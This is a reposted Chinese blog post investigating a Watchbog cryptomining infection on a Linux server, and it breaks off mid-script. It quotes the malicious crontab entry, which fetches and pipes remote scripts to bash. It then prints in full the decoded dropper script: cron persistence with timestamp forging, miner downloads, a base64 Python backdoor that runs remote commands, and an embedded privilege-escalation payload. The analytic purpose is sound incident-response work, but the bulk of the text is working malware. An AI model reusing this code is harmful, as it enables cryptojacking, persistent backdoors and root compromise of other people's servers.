碼上快樂

相關內容    簡體    繁體

Watchbog挖礦病毒程序排查過程

本文轉載自   查看原文   2019-03-11 19:33   3990    服務器安全

 第1章 情況

1)服務器收到cpu報警,cpu被占用達到100%,登錄服務器查看,發現cpu被一個watchbog的進程占滿了,如下圖所示:

2)並且無論如何都殺不掉,用kill殺掉后,其還是會隔一會自動起來,很明顯被加入了定時任務,果不其然系統自帶的定時任務已經被入侵了,如下所示:

*/9 * * * * (curl -fsSL https://pastebin.com/raw/AgdgACUD||wget -q -O- https://pastebin.com/raw/AgdgACUD||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvw
xG8").read()'||curl -fsSL https://gitee.com/return_block/party_1/raw/master/main/api/README.md||wget -q -O - https://gitee.com/return_block/party_1/raw/master/main/api/README.md||curl -fsS
L https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt)|bash

打開這個URL,發現像是一堆base64的密文,密文地址,使用base64解密出來是這個樣的,下面是解密后的腳本,詳情如下:

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the TnF job copy
 
function system() {
    rm -rf /bin/httpntp
    grep -v "/bin/httpntp" /etc/crontab > /etc/crontab.bak && mv /etc/crontab.bak /etc/crontab
    if [ ! -f "/bin/httpntp" ]; then
        curl -fsSL https://pastebin.com/raw/3XEzey2T -o /bin/httpntp && chmod 755 /bin/httpntp
        if [ ! -f "/bin/httpntp" ]; then
            wget  https://pastebin.com/raw/3XEzey2T -O /bin/httpntp && chmod 755 /bin/httpntp
        fi
        if [ ! -f "/etc/crontab" ]; then
            echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
        else
            echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
        fi
    fi
}
 
function dragon() {
    nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKI3NpbXBsZSBodHRwX2JvdAppbXBvcnQgdXJsbGliCmltcG9ydCBiYXNlNjQKaW1wb3J0IG9zCgpkZWYgc29zKCk6CiAgICB1cmwgPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzA1cDBmVFlkJwogICAgdHJ5OgogICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3Blbih1cmwpLnJlYWQoKSkKICAgICAgICBmID0gb3MucG9wZW4oc3RyKHBhZ2UpKQogICAgZXhjZXB0OgogICAgICAgIHByaW50KCdmYWlsZWQgdG8gZXhlY3V0ZSBvcyBjb21tYW5kJykKICAgICAgICBwYXNzCgpkZWYgcnVuU2NyaXB0KCk6CiAgICB1cmwgPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0t4V1BGZUVuJwogICAgdHJ5OgogICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3Blbih1cmwpLnJlYWQoKSkKICAgICAgICBleGVjKHBhZ2UpCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoJ2ZhaWxlZCB0byBleGVjdXRlIG9zIHB5dGhvbiBzY3JpcHQnKQogICAgICAgIHBhc3MKCmQ9ICdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvWDZ3dnV2OTgnCnRyeToKICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3BlbihkKS5yZWFkKCkpCiAgICBpZiBwYWdlID09ICdvcyc6CiAgICAgICAgc29zKCkKICAgIGVsaWYgcGFnZSA9PSAnc2NyaXB0JzoKICAgICAgICBydW5TY3JpcHQoKQogICAgZWxzZToKICAgICAgICBwcmludCgnSSBjYW5cJ3QgdW5kZXJzdGFuZCB0aGUgYWN0aW9uIGFtIGdpdmVuJykKZXhjZXB0OgogICAgcHJpbnQoJ1NvcnJ5IGJvc3MgSSBjYW5cJ3QgZ2V0IGluc3RydWN0aW9ucycpCiAgICBwYXNzCg=='))" >/dev/null 2>&1 &
    touch /tmp/.tmpza
}
 
function cronhigh() {
    chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
    rm -rf /etc/cron.hourly/Anacron /etc/cron.daily/Anacron /etc/cron.monthly/Anacron
    echo -e "*/3 * * * * root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/root
    echo -e "*/5 * * * * root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/system
    echo -e "*/7 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo -e "*/9 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/crontabs/root
    mkdir -p /etc/cron.hourly
    curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron
    if [ ! -f "/etc/cron.hourly/Anacron" ]; then
        wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron
    fi
    mkdir -p /etc/cron.daily
    curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron
    if [ ! -f "/etc/cron.daily/Anacron" ]; then
        wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron
    fi
    mkdir -p /etc/cron.monthly
    curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron
    if [ ! -f "/etc/cron.monthly/Anacron" ]; then
        wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron
    fi
    touch -acmr /bin/sh /var/spool/cron/root
    touch -acmr /bin/sh /var/spool/cron/crontabs/root
    touch -acmr /bin/sh /etc/cron.d/system
    touch -acmr /bin/sh /etc/cron.d/root
    touch -acmr /bin/sh /etc/cron.hourly/Anacron
    touch -acmr /bin/sh /etc/cron.daily/Anacron
    touch -acmr /bin/sh /etc/cron.monthly/Anacron
}
 
function cronlow() {
    cr=$(crontab -l | grep -q "https://pastebin.com/raw/3XEzey2T" | wc -l)
    if [ ${cr} -eq 0 ];then
        echo "Cron dosen't exists"
        crontab -r
        (crontab -l 2>/dev/null; echo "*/1 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash > /dev/null 2>&1")| crontab -
    else
        echo "Cron exists"
    fi
}
 
function downloadlow() {
    pa=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
    if [ ${pa} -eq 0 ];then
        mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
        rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/*
        if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json" ]; then
            curl -fsSL https://ptpb.pw/WpNh | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json" ]; then
                wget https://ptpb.pw/WpNh -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json
            fi
        fi
        ARCH=$(uname -m)
        if [ "$ARCH" == "x86_64" ]; then
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                curl -fsSL https://ptpb.pw/D8r9 -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                    wget https://ptpb.pw/D8r9 -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                fi
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        elif [ "$ARCH" == "i686" ]; then
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                    wget https://pixeldra.in/api/download/nZ2s4L -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                fi
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        else
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                    wget https://pixeldra.in/api/download/nZ2s4L -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                fi
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        fi
    fi
}
 
function downloadhigh() {
    pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
    if [ ${pb} -eq 0 ];then
        rm -rf /bin/config.json /bin/watchbog
        if [ ! -f "/bin/config.json" ]; then
            curl -fsSL https://ptpb.pw/WpNh | base64 -d >  /bin/config.json && chmod 777 /bin/config.json
            if [ ! -f "/bin/config.json" ]; then
                wget https://ptpb.pw/WpNh -O - | base64 -d > /bin/config.json && chmod 777 /bin/config.json
            fi
        fi
        ARCH=$(uname -m)
        if [ "$ARCH" == "x86_64" ]; then
            if [ ! -f "/bin/watchbog" ]; then
                curl -fsSL https://ptpb.pw/D8r9 -o /bin/watchbog && chmod 777 /bin/watchbog
                if [ ! -f "/bin/watchbog" ]; then
                    wget https://ptpb.pw/D8r9 -O /bin/watchbog && chmod 777 /bin/watchbog
                fi
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        elif [ "$ARCH" == "i686" ]; then
            if [ ! -f "/bin/watchbog" ]; then
                curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /bin/watchbog && chmod 777 /bin/watchbog
                if [ ! -f "/bin/watchbog" ]; then
                    wget https://pixeldra.in/api/download/nZ2s4L -O /bin/watchbog && chmod 777 /bin/watchbog
                fi
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        else
            if [ ! -f "/bin/watchbog" ]; then
                curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /bin/watchbog && chmod 777 /bin/watchbog
                if [ ! -f "/bin/watchbog" ]; then
                    wget https://pixeldra.in/api/download/nZ2s4L -O /bin/watchbog && chmod 777 /bin/watchbog
                fi
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        fi
    fi
}
 
 
function testhigh() {
    pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
    if [ ${pb} -eq 0 ];then
        rm -rf /bin/watchbog /bin/config.json
        if [ ! -f "/bin/config.txt" ]; then
            curl -fsSL https://ptpb.pw/KAlo | base64 -d > /bin/config.txt && chmod 777 /bin/config.txt
            if [ ! -f "/bin/config.txt" ]; then
                wget https://ptpb.pw/KAlo -O - | base64 -d > /bin/config.txt && chmod 777 /bin/config.txt
            fi
        fi
        if [ ! -f "/bin/cpu.txt" ]; then
            curl -fsSL https://ptpb.pw/Nqo- | base64 -d > /bin/cpu.txt && chmod 777 /bin/cpu.txt
            if [ ! -f "/bin/cpu.txt" ]; then
                wget https://ptpb.pw/Nqo- -O - | base64 -d > /bin/cpu.txt && chmod 777 /bin/cpu.txt
            fi
        fi
        if [ ! -f "/bin/pools.txt" ]; then
            curl -fsSL https://ptpb.pw/9Lyg | base64 -d >  /bin/pools.txt && chmod 777 /bin/pools.txt
            if [ ! -f "/bin/pools.txt" ]; then
                wget https://ptpb.pw/9Lyg -O - | base64 -d > /bin/pools.txt && chmod 777 /bin/pools.txt
            fi
        fi
        ARCH=$(uname -m)
        if [ "$ARCH" == "x86_64" ]; then
            if [ ! -f "/bin/watchbog" ]; then
                curl -fsSL https://ptpb.pw/mNJt -o /bin/watchbog && chmod 777 /bin/watchbog
                if [ ! -f "/bin/watchbog" ]; then
                    wget https://ptpb.pw/mNJt -O /bin/watchbog && chmod 777 /bin/watchbog
                fi
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /bin/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        else
            rm -rf /bin/cpu.txt /bin/pools.txt /bin/config.txt 
        fi
    fi
}
 
function testlow() {
    pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
    if [ ${pb} -eq 0 ];then
        mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
        rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/*
        if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt" ]; then
            curl -fsSL https://ptpb.pw/KAlo | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt" ]; then
                wget https://ptpb.pw/KAlo -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
            fi
        fi
        if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt" ]; then
            curl -fsSL https://ptpb.pw/Nqo- | base64 -d >  /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt" ]; then
                wget https://ptpb.pw/Nqo- -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt
            fi
        fi
        if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt" ]; then
            curl -fsSL https://ptpb.pw/9Lyg | base64 -d >  /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt" ]; then
                wget https://ptpb.pw/9Lyg -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt
            fi
        fi
        ARCH=$(uname -m)
        if [ "$ARCH" == "x86_64" ]; then
            if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                curl -fsSL https://ptpb.pw/mNJt -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
                    wget https://ptpb.pw/mNJt -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
                fi
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            else
                cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
                nohup ./watchbog >/dev/null 2>&1 &
            fi
        else
            rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt 
        fi
    fi
}
 
function successhigh() {
    (curl -fsSL https://pastebin.com/raw/eCZwXCiK || wget -q -O - https://pastebin.com/raw/eCZwXCiK)
    touch /tmp/.tmpc
}    
 
function successlow() {
    (curl -fsSL https://pastebin.com/raw/fMXdbHRs || wget -q -O - https://pastebin.com/raw/fMXdbHRs)
    touch /tmp/.tmpc
}
 
function elevate() {
    ARCH=$(uname -m)
    if [ "$ARCH" == "x86_64" ]; then
        echo "The Arch Is Supported lets GO On"
        python -V >/dev/null 2>&1
        if [ "$?" = "0" ]; then
            echo "Python Is Avalaible lets GO On"
            python -c "import base64;exec(base64.b64decode('aW1wb3J0IGhhc2hsaWIKaW1wb3J0IG9zCmltcG9ydCBvcy5wYXRoCmltcG9ydCB0aW1lCgpqb2tlX2RpYyA9IFsKICAgICc0LjQuMC0zMS1nZW5lcmljJywKICAgICc0LjQuMC02Mi1nZW5lcmljJywKICAgICc0LjQuMC04MS1nZW5lcmljJywKICAgICc0LjQuMC0xMTYtZ2VuZXJpYycsCiAgICAnNC44LjAtNTgtZ2VuZXJpYycsCiAgICAnNC4xMC4wLjQyLWdlbmVyaWMnLAogICAgJzQuMTMuMC0yMS1nZW5lcmljJywKICAgICc0LjkuMC0zLWFtZDY0JywKICAgICc0LjkuMC1kZWVwaW4xMy1hbWQ2NCcsCiAgICAnNC44LjAtNTItZ2VuZXJpYycsCiAgICAnNC44LjYtMzAwLmZjMjUueDg2XzY0JywKICAgICc0LjExLjgtMzAwLmZjMjYueDg2XzY0JywKICAgICc0LjEzLjktMzAwLmZjMjcueDg2XzY0JywKICAgICc0LjUuMi1hdWZzLXInLAogICAgJzQuNC4wLTg5LWdlbmVyaWMnLAogICAgJzQuOC4wLTU4LWdlbmVyaWMnLAogICAgJzQuMTMuMC0xNi1nZW5lcmljJywKICAgICc0LjkuMzUtZGVza3RvcC0xLm1nYTYnLAogICAgJzQuNC4yOC0yLU1BTkpBUk8nLAogICAgJzQuMTIuNy0xMS5jdXJyZW50JywKICAgICc0LjQuMC04OS1nZW5lcmljJywKICAgICc0LjguMC00NS1nZW5lcmljJywKICAgICc0LjEwLjAtMjgtZ2VuZXJpYycsCiAgICAnNC4xMC4wLTE5LWdlbmVyaWMnLAogICAgJzQuOC4wLTM5LWdlbmVyaWMnXQoKbXlfa2VybmVsX3ZlciA9IG9zLnBvcGVuKCd1bmFtZSAtcicpLnJlYWQoKS5zdHJpcCgpICMKCmNvbSA9ICcnJ25vaHVwIGJhc2ggLWMgJyhjdXJsIC1mc1NMIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy8zWEV6ZXkyVHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzNYRXpleTJUKXxiYXNoJyA+L2Rldi9udWxsIDI+JjEgJgpybSAtcmYgL3RtcC9hY3RpdmF0ZScnJwoKZGVmIG1kNUNoZWNrc3VtKGZpbGVQYXRoKToKICAgIHdpdGggb3BlbihmaWxlUGF0aCwgJ3JiJykgYXMgZmg6CiAgICAgICAgbSA9IGhhc2hsaWIubWQ1KCkKICAgICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICBkYXRhID0gZmgucmVhZCg4MTkyKQogICAgICAgICAgICBpZiBub3QgZGF0YToKICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgIG0udXBkYXRlKGRhdGEpCiAgICAgICAgcmV0dXJuIG0uaGV4ZGlnZXN0KCkKCmRlZiBtYWluKCk6CiAgICBHb0pva2UgPSBteV9rZXJuZWxfdmVyIGluIGpva2VfZGljCiAgICBmID0gb3BlbignL3RtcC9hY3RpdmF0ZScsICd3JykKICAgIGYud3JpdGUoY29tKQogICAgZi5jbG9zZSgpICAgIAogICAgaWYgR29Kb2tlOgogICAgICAgIGlmIG9zLnBhdGguZXhpc3RzKCcvdXNyL2Jpbi93Z2V0JykgYW5kIG9zLnBhdGguaXNmaWxlKCcvdXNyL2Jpbi93Z2V0Jyk6CiAgICAgICAgICAgIG9zLnN5c3RlbSgnd2dldCBodHRwczovL3BpeGVsZHJhLmluL2FwaS9kb3dubG9hZC84aUZFRWcgLU8gL3RtcC9lbGF2YXRlICYmIGNobW9kIDc3NyAvdG1wL2VsYXZhdGUgJiYgY2htb2QgK3ggL3RtcC9lbGF2YXRlJykKICAgICAgICBlbGlmIG9zLnBhdGguZXhpc3RzKCcvdXNyL2Jpbi9jdXJsJykgYW5kIG9zLnBhdGguaXNmaWxlKCcvdXNyL2Jpbi9jdXJsJyk6CiAgICAgICAgICAgIG9zLnN5c3RlbSgnY3VybCBodHRwczovL3BpeGVsZHJhLmluL2FwaS9kb3dubG9hZC84aUZFRWcgLW8gL3RtcC9lbGF2YXRlICYmIGNobW9kIDc3NyAvdG1wL2VsYXZhdGUgJiYgY2htb2QgK3ggL3RtcC9lbGF2YXRlJykKICAgICAgICBlbHNlOgogICAgICAgICAgICByZXR1cm4KICAgICAgICBpZiBvcy5wYXRoLmV4aXN0cygnL3RtcC9lbGF2YXRlJykgYW5kIG9zLnBhdGguaXNmaWxlKCcvdG1wL2VsYXZhdGUnKToKICAgICAgICAgICAgaWYgbWQ1Q2hlY2tzdW0oJy90bXAvZWxhdmF0ZScpPT0nMTU3NDk1ZjZiYThjMzZjMzg5ODRkMWY5MDJjZjNhYzAnOgogICAgICAgICAgICAgICAgb3Muc3lzdGVtKCdjZCAvdG1wLyAmJiAuL2VsYXZhdGUgPCBhY3RpdmF0ZScpCiAgICAgICAgICAgICAgICB0aW1lLnNsZWVwKDEwKQogICAgZWxzZToKICAgICAgICByZXR1cm4KCm1haW4oKQo='))" >/dev/null 2>&1
        else
            cronlow
            downloadlow
        fi
        sleep 30
        if [ ! -f "/tmp/activate" ]; then
            echo "I guess The Exploit worked"
            pmp=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
            if [ ${pmp} -ne 0 ];then
                pup=$(ps auxf | grep 'watchbog' | grep -v grep | awk '{print $1}')
                if [ "$pup" == "root" ];then
                    echo "The Exploit worked Successfully"
                    echo "Hahahahha"
                    rm -rf /tmp/elevate
                    cronlow
                    exit 0
                else
                    cronlow
                    downloadlow
                fi
            else
                cronlow
                downloadlow
            fi
        else
            rm -rf /tmp/elevate
            rm -rf /tmp/activate
            cronlow
            downloadlow
        fi
    else
        cronlow
        downloadlow
    fi
}
 
 
update=$( (curl -fsSL --max-time 120 https://pastebin.com/raw/2unJiD3b) )
if [ "$update" == "update"x ];then
    echo "An update exists boss"
    rm -rf /tmp/.tmpza
    if [ ! -f "/tmp/.tmpold" ]; then
        spreada
    fi
else
    echo "NO update exists boss"
fi
BS=$( whoami )
echo "I am $BS"
if [ ! -f "/tmp/.tmpnewasss" ]; then
    touch /tmp/.tmpnewasss
    rm /tmp/.tmpnewzz
    ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
    pkill -f watchbog
fi
if [ "$BS" != "root" ];then
    if [ ! -f "/tmp/.tmpleve" ]; then
        crontab -r
        ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
        pkill -f watchbog
    fi
    ps -fe|grep 'watchbog'|grep -v grep|wc -l
    if [ $? -ne 0 ];then
        echo "It's running boss"
        crontab -r 
        cronlow
    else
        if [ ! -f "/tmp/.tmpleve" ]; then
            rm -rf /tmp/.tmpelev
            touch /tmp/.tmpleve
            elevate
        else
            downloadlow
        fi
        cronlow
        sleep 15
        if [ ${pm} -eq 0 ];then
            testlow
        fi
        pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
        if [ ${pm} -ne 0 ];then
            if [ ! -f "/tmp/.tmpc" ]; then
                successlow
            fi
        fi
    fi
fi
if [ "$BS" == "root" ];then
    ps -fe|grep 'watchbog'|grep -v grep|wc -l
    if [ $? -ne 0 ];then
        echo "It's running boss"
        system
        cronhigh
        downloadhigh
    else
        system
        cronhigh
        downloadhigh
        sleep 15
        pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
        if [ ${pm} -ne 0 ];then
